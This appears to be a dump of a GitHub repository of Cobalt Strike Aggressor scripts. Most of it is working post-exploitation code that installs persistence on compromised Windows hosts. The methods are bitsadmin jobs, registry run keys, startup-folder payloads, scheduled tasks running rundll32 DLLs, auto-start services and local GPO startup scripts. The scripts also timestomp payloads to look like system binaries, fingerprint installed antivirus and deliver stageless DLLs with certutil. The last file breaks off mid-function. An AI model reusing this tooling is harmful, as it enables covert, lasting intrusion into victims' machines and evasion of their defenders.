├── All_In_One.cna
├── Logging
├── README.md
├── logs.py
├── Logger.cna
└── av_hips_executables.txt
├── DriverSearcher
├── EDRQuery.sln
└── DriverSearcher
│ ├── Properties
│ └── AssemblyInfo.cs
│ ├── EDRQuery.csproj
│ └── Program.cs
├── Persistence
├── Bitsadmin.cna
├── RegistryPersist.cna
├── StartUpFolderPersist.cna
├── UserSchtasksPersist.cna
├── ServiceEXEPersist.cna
├── StartupGPOPersist.cna
├── HKLMRunKeyPSRegistryPersist.cna
├── HKCURunKeyPSRegistryPersist.cna
├── README.md
├── WMICEventPersist.cna
├── WMIEventPersist.cna
└── Persistence_Menu.cna
├── ProcessMonitor.ps1
├── README.md
├── AVQuery.cna
├── CertUtilWebDelivery.cna
├── ArtifactPayloadGenerator.cna
├── logvis.cna
├── ProcessMonitor.cna
├── SMBPayloadGenerator.cna
├── RedTeamRepo.cna
├── EDR.cna
└── ProcessColor.cna
/All_In_One.cna:
--------------------------------------------------------------------------------
1 | Remaking this completely. Keep an eye out for a version 2 release :)
2 |
--------------------------------------------------------------------------------
/Logging/README.md:
--------------------------------------------------------------------------------
1 | # Logging Scripts
2 |
3 | **Logger.cna Dependencies:**
4 |
5 | Parent Folder:
6 | /opt/cobaltstrike/Logger.cna
7 | /opt/cobaltstrike/av_hips_executables.txt
8 | /opt/cobaltstrike/logs.py
9 |
10 | * logs.py
11 |
12 | * Author: Matthew Merrill @merrillmatt011
13 |
14 | * Python script that parses all Cobalt Strike operator-input/beacon-output logs and exports them into a single HTML report. Note: log content (commands, hostnames, usernames) is written into the HTML without escaping, so open the report in a trusted viewer.
15 |
16 | * Still in beta
17 |
18 | * Syntax: ./logs.py [Operator/Teamserver NickName] — only input-log lines containing this string are exported; it is also used in the output file name (YYYYMonDD_<name>_log.html).
19 |
20 | * Logger.cna
21 |
22 | * Logging script that captures all the Beacon outputs. Formats the Beacon input line to display timestamps. Use with logs.py to export all the logs for each operator.
23 | * All logs will be created inside the /opt/cobaltstrike/logs/ directory
24 |
25 | 
26 | 
27 |
--------------------------------------------------------------------------------
/DriverSearcher/EDRQuery.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.26730.16
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "EDRQuery", "DriverSearcher\EDRQuery.csproj", "{AFD1FF09-2632-4087-A30C-43591F32E4E8}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {AFD1FF09-2632-4087-A30C-43591F32E4E8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {AFD1FF09-2632-4087-A30C-43591F32E4E8}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {AFD1FF09-2632-4087-A30C-43591F32E4E8}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {AFD1FF09-2632-4087-A30C-43591F32E4E8}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {4062063D-7FA2-41F1-AFAA-C9AB9D75A88F}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Persistence/Bitsadmin.cna:
--------------------------------------------------------------------------------
1 | #Bitsadmin Persistence
2 | #Author: @r3dQu1nn
3 | #Creates a bitsadmin job for Persistence
4 | #Credit to: https://twitter.com/Moriarty_Meng/status/993861660405215232
5 |
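sub persistbits {
    # Open the Bitsadmin persistence dialog for the selected Beacon(s).
    # $1 - beacon id (or list of ids, as handed over by the popup below).
    #
    # The dialog callback (&bitsadmin) reads the global $bid, so it is set
    # here, not declared local. The values are validated before the
    # callback is reached so that empty fields do not produce half-built
    # bitsadmin jobs on the target.
    $bid = $1;
    $dialog = dialog("Bitsadmin Persistence", %(jobname => "", exe => ""), lambda({
        # $1 dialog, $2 button, $3 %values
        if (strlen($3['jobname']) == 0 || strlen($3['exe']) == 0) {
            berror($bid, "\c4Please enter a job name and the full path of the payload executable.");
            return;
        }
        bitsadmin($1, $2, $3);
    }));
    dialog_description($dialog, "Creates a bitsadmin job to execute as your current user context. This job will be executed every time the user logs in. Currently only works on Windows 7, 8, Server 2008, Server 2012.");

    drow_text($dialog, "jobname", "Name for bitsadmin job:");
    drow_text($dialog, "exe", "Payload Executable (Use full path):");

    dbutton_action($dialog, "Create");
    dialog_show($dialog);
}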
18 |
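sub bitsadmin {
    # Dialog callback: $1 dialog, $2 button, $3 %values (jobname, exe).
    # Relies on the global $bid set by &persistbits when the dialog was opened.
    # Job name and payload path are quoted so values containing spaces do not
    # split into extra bitsadmin arguments.
    local('$job $exe');
    $job = '"' . $3['jobname'] . '"';
    $exe = '"' . $3['exe'] . '"';

    blog($bid, "Installing bitsadmin Persistence as " . $3["jobname"] . "..");
    # 1. create the (suspended) job
    bpowerpick!($bid, 'bitsadmin /rawreturn /create ' . $job);
    # 2. a job needs at least one transfer; this copies a local system DLL to a
    #    benign-looking name under Public\Documents. That file is left behind
    #    on the target and is not cleaned up by this script.
    bpowerpick!($bid, 'bitsadmin /rawreturn /addfile ' . $job . ' C:\\Windows\\System32\\user32.dll C:\\Users\\Public\\Documents\\user32.gif');
    # 3. the payload is the job's completion command; "NULL" = no arguments
    bpowerpick!($bid, 'bitsadmin /rawreturn /setnotifycmdline ' . $job . ' ' . $exe . ' NULL');
    bpowerpick!($bid, 'bitsadmin /rawreturn /setpriority ' . $job . ' high');
    # 4. resume the job so the transfer (and therefore the notify command) runs
    bpowerpick!($bid, 'bitsadmin /rawreturn /resume ' . $job);
}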
27 |
popup beacon_bottom {
    # Beacon context-menu entry. $1 is the list of selected beacon ids and is
    # passed straight through, so the dialog (and every command it queues)
    # addresses all selected beacons at once.
    item "Bitsadmin Persistence" {
        persistbits($1);
    }
}
33 |
--------------------------------------------------------------------------------
/ProcessMonitor.ps1:
--------------------------------------------------------------------------------
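function Get-Proc {
<#
.SYNOPSIS
Lists processes created within the last N minutes.

.DESCRIPTION
Cobaltstrike has a great general function for processes: the 'ps' command. Use that if you need to dump ALL the processes w/ arch.

This solution shows only the running processes whose creation date falls within the past $Time minutes, giving more SA to the operator/analyst than an entire process list.

Both solutions have their place. It is up to you to know how to use which when you need it.

Module info for the process list has been removed because nobody used it in the two years that the survey script was around. If you need to do IR on a box, there are better ways to do so than by clogging up the screen in a survey.

.PARAMETER Time
Look-back window in minutes. Declared [int] so the arithmetic below is explicit; a numeric string such as "60" is still accepted (the original declared it [string] and relied on PowerShell coercing it in the subtraction).

.OUTPUTS
Text lines: PID, PPID, process name (truncated to 20 characters), parent process name, owner.
#>

    param
    (
        [Parameter(Mandatory = $True)]
        [int]$Time
    )

    $procs  = Get-WmiObject Win32_Process | Sort-Object -Property ProcessId
    $cutoff = (Get-Date).AddMinutes(-$Time)

    # Index by PID once so each parent lookup is a hash probe instead of a scan
    # of the whole list (the original re-filtered the list for every row).
    # Keys are cast to [int] on both sides: ProcessId/ParentProcessId come back
    # as UInt32 and would otherwise never match an [int] key.
    $byPid = @{}
    foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }

    "`n[+] Processes created in the past $Time minutes`n"
    "{0,-8}{1,-8}{2,-20} {3,-20} {4}" -f "PID","PPID","PID Name","PPID Name","Owner"

    foreach ($p in $procs) {
        # Some system entries carry no CreationDate; skip them rather than hand
        # $null to the converter.
        if (-not $p.CreationDate) { continue }
        $created = [Management.ManagementDateTimeConverter]::ToDateTime($p.CreationDate)
        if ($created -le $cutoff) { continue }

        $name = $p.ProcessName
        if ($name.Length -gt 20) { $name = $name.Substring(0, 20) }

        # The parent may already have exited (its PID is then absent from the
        # snapshot); print an empty parent name in that case, as the original did.
        $parent     = $byPid[[int]$p.ParentProcessId]
        $parentName = if ($parent) { $parent.Caption } else { "" }

        "{0,-8}{1,-8}{2,-20} {3,-20} {4}" -f $p.ProcessId, $p.ParentProcessId, $name, $parentName, $p.GetOwner().User
    }
}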
--------------------------------------------------------------------------------
/Persistence/RegistryPersist.cna:
--------------------------------------------------------------------------------
1 | #Registry Persistence
2 | #Author: @r3dQu1nn
3 | #Depending on Registry Location elevated access might be required
4 |
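sub persistRegistry {
    # Registry persistence dialog for the selected Beacon ($1).
    # Runs `reg add <location> /v <name> /t <type> /d <payload> /f` through
    # powerpick and then `reg query` to show the result.
    # HKLM locations need an elevated beacon; this script does not check that.
    # The beacon id is captured into the callback closure so the commands go to
    # the beacon the dialog was opened from, not to whatever the global $bid
    # holds when "Create" is eventually clicked.
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("Registry Persistence", %(reglocation => "Registry Location..", keyname => "Key Name..", datatype => "Data Type..(REG_SZ)", keyvalue => "Key Value..(Payload)"), lambda({
        # Refuse to run while any field still holds its placeholder text.
        if ("$3['reglocation']" ismatch 'Registry Location..' || "$3['keyname']" ismatch 'Key Name..' || "$3['datatype']" ismatch 'Data Type..(REG_SZ)' || "$3['keyvalue']" ismatch 'Key Value..(Payload)') {
            berror($bid, "\c4Please enter a valid Registry Location, Key Name, Key Type, and a valid Payload Location.");
            return;
        }
        # /f overwrites an existing value of the same name without asking --
        # pick a name that does not collide with a legitimate entry.
        bpowerpick($bid, 'reg add "'.$3['reglocation'].'" /v "'.$3['keyname'].'" /t "'.$3['datatype'].'" /d "'.$3['keyvalue'].'" /f');
        bpowerpick($bid, 'reg query "'.$3['reglocation'].'"');
    }, $bid => $bid));

    dialog_description($dialog, "Registry Persistence - Creates a custom Registry Entry for persistence on selected beacon. **HKLM\\ could require elevated access.");

    drow_text($dialog, "reglocation", "Registry Location:");
    drow_text($dialog, "keyname", "Registry Key Name:");
    drow_text($dialog, "datatype", "Registry Key Type:");
    drow_text($dialog, "keyvalue", "Registry Key Value..(Payload Location):");

    dbutton_action($dialog, "Create");
    dialog_show($dialog);
}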
29 |
popup beacon_bottom {
    # Beacon context-menu entry. $1 is the list of selected beacon ids; it is
    # passed through unchanged, so the registry commands are queued on every
    # selected beacon. No privilege check is done here (HKLM needs elevation).
    item "Registry Persistence" {
        persistRegistry($1);
    }
}
35 |
--------------------------------------------------------------------------------
/Persistence/StartUpFolderPersist.cna:
--------------------------------------------------------------------------------
1 | #StartUpFolder Persistence
2 | #Author: @r3dQu1nn
3 | #Quick and easy persistence via a StartUpFolder
4 | #Windows will have different StartUp locations dependent upon the version of the OS
5 |
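sub persistThroughStartUpFolder {
    # Startup-folder persistence dialog for the selected Beacon ($1).
    # Uploads the chosen payload into the given startup directory and
    # timestomps it to look like calc.exe.
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("Start Up Folder Persistence", %(startup => "Startup Directory Folder..", payload => "Select Payload.."), lambda({
        local('$fname $remote');
        # Refuse to run while a field still holds its placeholder text.
        if ("$3['startup']" ismatch 'Startup Directory Folder..' || "$3['payload']" ismatch 'Select Payload..') {
            berror($bid, "\c4Please enter a valid Startup Directory Folder, and select a Payload.");
            return;
        }
        # bupload keeps the local file name, so this is the name on the target.
        $fname  = split("/", $3['payload'])[-1];
        $remote = $3['startup'] . "\\" . $fname;
        # Change Beacon's own working directory: bupload writes into Beacon's
        # cwd, and a `cd` issued inside a separate powerpick process (what the
        # original did) does not affect it.
        bcd($bid, $3['startup']);
        bupload($bid, $3['payload']);
        # Timestomp the uploaded file on the target. The original passed the
        # operator-side path selected in the dialog, which does not exist there.
        btimestomp($bid, $remote, "c:\\windows\\system32\\calc.exe");
    }, $bid => $bid));
    dialog_description($dialog, "Start Up Folder Persistence - Generates a Startup Folder Entry and places a payload inside that folder. **Windows NT 6.0-10.0/All Users Location - %SystemDrive%\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup | Windows NT 6.0-10.0/Current User Location %SystemDrive%\\Users\\%UserName%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup");

    drow_text($dialog, "startup", "StartUp Directory Folder Location:");
    drow_file($dialog, "payload", "Select Payload:");

    dbutton_action($dialog, "Create");
    dialog_show($dialog);
}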
27 |
popup beacon_bottom {
    # Beacon context-menu entry. $1 is the list of selected beacon ids and is
    # passed through unchanged (the upload/timestomp is queued on each of them).
    item "Windows StartUp Folder Persistence" {
        persistThroughStartUpFolder($1);
    }
}
33 |
--------------------------------------------------------------------------------
/DriverSearcher/DriverSearcher/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
// Assembly metadata. Everything here is embedded verbatim in the compiled
// binary's version resource, so it is visible to anyone (or anything) that
// inspects the file. NOTE(review): the title/product say "DriverSearcher"
// while the project and solution are named EDRQuery (see EDRQuery.sln and
// the csproj); pick one name deliberately rather than shipping both.
[assembly: AssemblyTitle("DriverSearcher")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("DriverSearcher")]
[assembly: AssemblyCopyright("Copyright © 2018")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM.
// It is the same GUID as the project GUID in EDRQuery.sln.
[assembly: Guid("afd1ff09-2632-4087-a30c-43591f32e4e8")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Persistence/UserSchtasksPersist.cna:
--------------------------------------------------------------------------------
1 | #User Schtasks Persistence
2 | #Author: @r3dQu1nn
3 | #Runs as current user for the selected beacon
4 | #Meant for quick user level persistence upon initial access
5 | #Thanks to @noone and bluescreenofjeff for help
6 |
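sub persistUserSchtasks {
    # Scheduled-task persistence dialog for the selected Beacon ($1).
    # Uploads a DLL into the target path and registers a task that runs it
    # through `rundll32.exe <dll>,StartW` under the given user and schedule.
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("User Schtasks Persistence", %(taskname => "Evil Task Name..", targetpath => "Target Path..", user => "User to Run as..", schedule => "Schedule modifier..", payloadfile => "Select DLL Payload.."), lambda({
        local('$fname');
        # Refuse to run while any field still holds its placeholder text.
        if ("$3['taskname']" ismatch 'Evil Task Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['payloadfile']" ismatch 'Select DLL Payload..' || "$3['user']" ismatch 'User to Run as..' || "$3['schedule']" ismatch 'Schedule modifier..') {
            berror($bid, "\c4Please enter a valid Task Name, Target Path, Schedule Modifier, and a valid Payload File.");
            return;
        }
        # bupload keeps the local file name; that is the name on the target.
        $fname = split("/", $3['payloadfile'])[-1];
        # bupload writes into Beacon's current directory, so set it first.
        bcd($bid, $3['targetpath']);
        bupload($bid, $3['payloadfile']);
        # NOTE(review): schtasks /ru with an account other than the current
        # user (or SYSTEM from an elevated beacon) normally also needs
        # /rp <password>; no password is passed here, so such tasks are likely
        # to fail to register -- confirm on the target.
        bpowerpick($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".$fname.',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
        # show the task back to the operator so a failed /create is visible
        bpowerpick($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
    }, $bid => $bid));

    dialog_description($dialog, "User Schtasks Persistence - Generates a schtask for persistence on selected beacon.");

    drow_text($dialog, "taskname", "Schtasks Taskname:");
    drow_text($dialog, "user", "User to Run as:");
    drow_text($dialog, "targetpath", "Target Path:");
    drow_text($dialog, "schedule", "Schedule Modifier:");
    drow_file($dialog, "payloadfile", "DLL Payload:");

    dbutton_action($dialog, "Create");
    dialog_show($dialog);
}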
34 |
popup beacon_bottom {
    # Beacon context-menu entry. $1 is the list of selected beacon ids and is
    # passed through unchanged.
    item "User Schtasks Persistence" {
        persistUserSchtasks($1);
    }
}
40 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Aggressor Scripts
2 | Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources
3 | * All_In_One.cna v1 - Removed and outdated
4 |
5 | * All purpose script to enhance the user's experience with cobaltstrike. Custom menu creation, Logging, Persistence, Enumeration, and 3rd party script integration.
6 | * Version 2 is currently in development!
7 |
8 | * ArtifactPayloadGenerator.cna
9 |
10 | * Generates every type of Stageless/Staged Payload based off a HTTP/HTTPS Listener
11 |
12 | * Creates /opt/cobaltstrike/Staged_Payloads, /opt/cobaltstrike/Stageless_Payloads
13 |
14 | * AVQuery.cna
15 |
16 | * Queries the Registry with powershell for all AV Installed on the target
17 |
18 | * Quick and easy way to get the AV you are dealing with as an attacker
19 |
20 | 
21 |
22 | * CertUtilWebDelivery.cna
23 |
24 | * Stageless Web Delivery using CertUtil.exe
25 |
26 | * Powerpick spawns certutil.exe on the target to download the hosted stageless DLL (saved as Adobedll.dll in the current directory), then runs it with rundll32.exe via the StartW export. Change the default file and URI names before use; the dropped DLL is not cleaned up.
27 |
28 | 
29 |
30 | * EDR.cna
31 |
32 | * Detects EDR solutions running on local/remote hosts
33 |
34 | * RedTeamRepo.cna
35 |
36 | * A common collection of OS commands, and Red Team Tips for when you have no Google or RTFM on hand.
37 |
38 | * Script will be updated on occasion, feedback and more inputs are welcomed!
39 |
40 | 
41 |
42 | * ProcessColor.cna
43 |
44 | * Color coded process listing without the file requirement.
45 |
46 | * Thanks to @oldb00t for the original version: https://github.com/oldb00t/AggressorScripts/tree/master/Ps-highlight
47 |
48 | 
49 |
50 |
--------------------------------------------------------------------------------
/AVQuery.cna:
--------------------------------------------------------------------------------
1 | #AntiVirus Query
2 | #Author: @r3dQu1nn
3 | #Queries the Registry for AV installed
4 | #Thanks to @i_am_excite and @merrillmatt011 for the help
5 | #Props to @zerosum0x0 for the wmic find!
6 |
# $powershellcmd: the PowerShell run by the AV_Query alias below. It
#  - matches every name in $av_list (PowerShell -match, i.e. a case-insensitive
#    regex) against DisplayName under both Uninstall hives (Wow6432Node and
#    native) and against the Path of every running process;
#  - reads the Windows Defender signature version from ...\Signature Updates;
#  - prints "PID|Name|Path" rows for matching processes, then
#    "AV Name|Version|Install Date" rows for matching Uninstall entries.
# Caveats, from the code as written:
#  - the name list is hard-coded; products not in it are simply not reported;
#  - "Malware" is a substring match (e.g. Malwarebytes) and matches any other
#    DisplayName or path containing that word as well;
#  - .ToString() is called on DisplayVersion/InstallDate, so an Uninstall
#    entry lacking one of them raises a null-method error for that row.
$powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$zz.Id.ToString(), \$zz.Name.Split('\"')[0], \$zz.Path.ToString()}}}};\$av_loop3 = foreach (\$av2 in \$av_list){foreach (\$key1 in \$av_install1){if (\$key1.DisplayName -match \$av2 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key1.DisplayName.ToString(), \$key1.DisplayVersion.ToString(), \$key1.InstallDate.ToString()}}}};Write-Output \"`nPID|Name|Path`n\";Write-Output \$av_loop;Write-Output \"`nWindows Defender AV Signature Version:\";(Get-ItemProperty -Path \$regkey).ASSignatureVersion;Write-Output \"`nAV Name|Version|Install Date`n\";Write-Output \$av_loop2;Write-Output \$av_loop3";

# Register "AV_Query" as a Beacon console command (help text only; the
# implementation is the alias below).
beacon_command_register("AV_Query", "Queries the Registry for AV Installed",
"Syntax: AV_Query\n" .
"Checks HKLM hive for All AntiVirus installed");
14 |
15 | #AV_Query alias
alias AV_Query {
    # Beacon console command "AV_Query". $1 is the beacon id.
    # Step 1: run the registry/process sweep held in $powershellcmd (defined
    #         at the top of this file).
    # Step 2: pause 30 s -- presumably to give the first job time to finish
    #         and return its output -- then ask WMI's SecurityCenter2
    #         namespace which AV products are registered.
    # NOTE(review): root\SecurityCenter2 is not present on every Windows SKU
    # (server editions in particular), so the second query may return nothing
    # there -- confirm on the target.
    local('$bid');
    $bid = $1;

    blog($bid, "\cBDetermining what AntiVirus is installed...");
    bpowerpick!($bid, $powershellcmd);
    bpause($bid, 30000);
    bpowerpick!($bid, "Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Query \"SELECT * FROM AntiVirusProduct\" | select-object displayName,pathToSignedReportingExe,timestamp| fl");
}
24 |
--------------------------------------------------------------------------------
/Persistence/ServiceEXEPersist.cna:
--------------------------------------------------------------------------------
1 | #Admin Level Custom Service EXE Persistence
2 | #Author: @r3dQu1nn
3 | #Runs as elevated user/SYSTEM for the selected beacon
4 |
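sub persistCustomService {
    # Service persistence dialog for the selected (elevated) Beacon ($1).
    # Uploads a service EXE into the target path, timestomps it, and
    # (re)creates an auto-start service pointing at it.
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("Admin Level Custom Service EXE Persistence", %(servicename => "Custom Service Name..", display => "Display Name for Custom Service..", description => "Description for Custom Service..", targetpath => "Target Path..", payloadfile => "Select Payload.."), lambda({
        local('$fname $remote');
        # Refuse to run while any field still holds its placeholder text.
        if ("$3['servicename']" ismatch 'Custom Service Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['display']" ismatch 'Display Name for Custom Service..' || "$3['description']" ismatch 'Description for Custom Service..' || "$3['payloadfile']" ismatch 'Select Payload..') {
            berror($bid, "\c4Please enter a valid Custom Service Name, Target Path, Display Name, Description and Payload File.");
            return;
        }
        # bupload keeps the local file name; this is where it lands on the target.
        $fname  = split("/", $3['payloadfile'])[-1];
        $remote = $3['targetpath'] . "\\" . $fname;
        # bupload writes into Beacon's current directory, so set it first.
        bcd($bid, $3['targetpath']);
        bupload($bid, $3['payloadfile']);
        # Timestomp the uploaded file on the target. The original passed the
        # operator-side path selected in the dialog, which does not exist there.
        btimestomp($bid, $remote, "C:\\Windows\\System32\\cmd.exe");
        # WARNING: `sc delete` removes any existing service with this name
        # before the new one is created -- a collision with a real service
        # name takes that service down.
        bpowerpick($bid, 'sc delete '.$3['servicename'].'');
        bpowerpick($bid, 'sc create '.$3['servicename'].' binpath= "'.$remote.'" error= ignore start= auto DisplayName= "'.$3['display'].'"');
        bpowerpick($bid, 'sc description '.$3['servicename'].' "'.$3['description'].'"');
        bpowerpick($bid, 'sc start '.$3['servicename'].'');
    }, $bid => $bid));
    dialog_description($dialog, "Generates a Custom Service for Admin Level persistence on selected beacon. **Only Service EXE Payloads should be used**");

    drow_text($dialog, "servicename", "Custom Service Name:");
    drow_text($dialog, "display", "Display Name for Custom Service:");
    drow_text($dialog, "description", "Description for Custom Service:");
    drow_text($dialog, "targetpath", "Target/Bin Path:");
    drow_file($dialog, "payloadfile", "Payload:");

    dbutton_action($dialog, "Create");
    dialog_show($dialog);
}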
34 |
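popup beacon_bottom {
    # Beacon context-menu entry. $1 is the list of selected beacon ids; each
    # one is gated on -isadmin because service creation needs elevation.
    item "Admin Level Custom Service EXE Persistence" {
        local('$bid');
        foreach $bid ($1) {
            if (-isadmin $bid) {
                persistCustomService($bid);
            }
            else {
                # Report to the beacon that failed the check, not to every
                # selected beacon (the original passed the whole list $1).
                berror($bid, "\c4Persistence Requires Admin Level Privileges");
            }
        }
    }
}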
48 |
--------------------------------------------------------------------------------
/Persistence/StartupGPOPersist.cna:
--------------------------------------------------------------------------------
1 | #Startup Script Local GPO Persistence
2 | #Author: @r3dQu1nn
3 | #Generates a Local GPO Entry in psscripts.ini to call a .ps1 script file for persistence on selected beacon
4 | #Calls back as SYSTEM
5 | #**Check permissions with GPO Enumeration (Successful GroupPolicy Directory Listing) first before executing**
6 | #**Beacon execution will cause winlogon.exe to hang and the end user can't login. Once the new beacon checks in inject into another process and kill the original. Update to come out soon.**
7 | #https://cybersyndicates.com/2016/01/system-context-persistence-in-gpo-startup/
8 |
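sub persistStartupGPO {
    # Local-GPO startup-script persistence dialog for the selected (elevated)
    # Beacon ($1). Uploads the chosen .ps1 into the machine GroupPolicy
    # startup directory and writes a psscripts.ini that runs it at boot
    # (as SYSTEM -- see the header comments and their winlogon warning).
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("Startup Script Local GPO Persistence", %(scriptfile => "Select PS1 Script File.."), lambda({
        local('$fname $ini $handle');
        if ("$3['scriptfile']" ismatch 'Select PS1 Script File..') {
            berror($bid, "\c4Please enter a valid .ps1 Script File.");
            return;
        }
        # bupload keeps the local file name; that is the name on the target.
        $fname = split("/", $3['scriptfile'])[-1];

        # Stage the script in C:\ then move it into the GPO startup directory.
        bcd($bid, "C:\\");
        bupload($bid, $3['scriptfile']);

        # Build psscripts.ini next to this .cna on the operator side. The
        # original opened a relative "psscripts.ini" (the client's working
        # directory) but uploaded script_resource("psscripts.ini") (the
        # script's own directory) -- two different files unless the client
        # happened to be started from that directory. Use one path for both.
        $ini    = script_resource("psscripts.ini");
        $handle = openf(">" . $ini);
        writeb($handle, "[ScriptsConfig]\nStartExecutePSFirst=true\n[Startup]\n0CmdLine=" . $fname . "\n0Parameters=");
        closef($handle);

        bpowerpick($bid, 'Move-Item -force -path C:\\'.$fname.' -destination C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\Startup\\');
        bupload($bid, $ini);
        # WARNING: this replaces any existing local-GPO psscripts.ini, so
        # startup scripts the host already had configured there are dropped.
        # Check the directory first (see the header comment on GPO enumeration).
        bpowerpick($bid, 'Remove-Item -Force C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\psscripts.ini');
        bpowerpick($bid, 'Move-Item -force -path C:\\psscripts.ini -destination C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\');
        bpowerpick($bid, 'gpupdate /force');
    }, $bid => $bid));

    dialog_description($dialog, "Startup Script Local GPO Persistence - Generates a Local GPO Entry in psscripts.ini to call a .ps1 script file for persistence on selected beacon. **Check permissions with GPO Enumeration (Successful GroupPolicy Directory Listing) first before executing**");

    drow_file($dialog, "scriptfile", ".ps1 Script File:");

    dbutton_action($dialog, "Create");
    dialog_show($dialog);
}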
39 |
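popup beacon_bottom {
    # Beacon context-menu entry. $1 is the list of selected beacon ids; each
    # one is gated on -isadmin because writing under GroupPolicy\Machine
    # needs elevation.
    item "Startup Script Local GPO Persistence" {
        local('$bid');
        foreach $bid ($1) {
            if (-isadmin $bid) {
                persistStartupGPO($bid);
            }
            else {
                # Report to the beacon that failed the check, not to every
                # selected beacon (the original passed the whole list $1).
                berror($bid, "\c4Persistence Requires Admin Level Privileges");
            }
        }
    }
}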
53 |
--------------------------------------------------------------------------------
/CertUtilWebDelivery.cna:
--------------------------------------------------------------------------------
1 | # CertUtil Scripted Web Delivery (Stageless)
2 | # Author: @r3dQu1nn
3 | # This script is based off the Scripted Web Delivery created by @armitagehacker, <3 raffi!
4 | # https://gist.github.com/rsmudge/629bd4ddce3bbbca1f8c16378a6a419c
5 | # Please be aware of the default values used in the script
6 | # Thanks to @carnal0wnage and @subTee for the discovery of this type of attack
7 | # https://twitter.com/subTee/status/888071631528235010
8 | # http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html
9 |
10 | # setup our stageless CertUtil Web Delivery attack
# Dialog callback: $1 dialog, $2 button, $3 %options (uri, host, port,
# listener, x64). Generates a stageless DLL for the chosen listener, hosts it
# on the team server's web server, and hands the operator a
# certutil + rundll32 one-liner.
sub stage_attack {
    local('%options $script $url $arch');
    %options = $3;

    # get the arch right. (checkbox value arrives as the string "true")
    $arch = iff(%options["x64"] eq "true", "x64", "x86");

    # generate our stageless CertUtil script. We're going to make *this* function
    # the callback for this call. That's why we yield after.
    # (artifact_stageless is asynchronous: it calls $this back with the
    # generated artifact, and the yield suspends this closure until then.)
    artifact_stageless(%options["listener"], "dll", $arch, $null, $this);
    yield;

    # this function is now resumed after &artifact_stageless finished. $1 is our script.
    $script = $1;

    # host the script (served from the team server at host:port/uri)
    $url = site_host(%options["host"], %options["port"], %options["uri"], $script, "automatic", "Scripted Web Delivery (CertUtil)");

    # tell the user our URL
    # OPSEC: the one-liner writes the DLL as Adobedll.dll into the target's
    # current directory and nothing here cleans it up; that name and the
    # hosted URI (default /dll.txt, see the popup below) are static strings
    # an analyst can key on, as the show_message below warns.
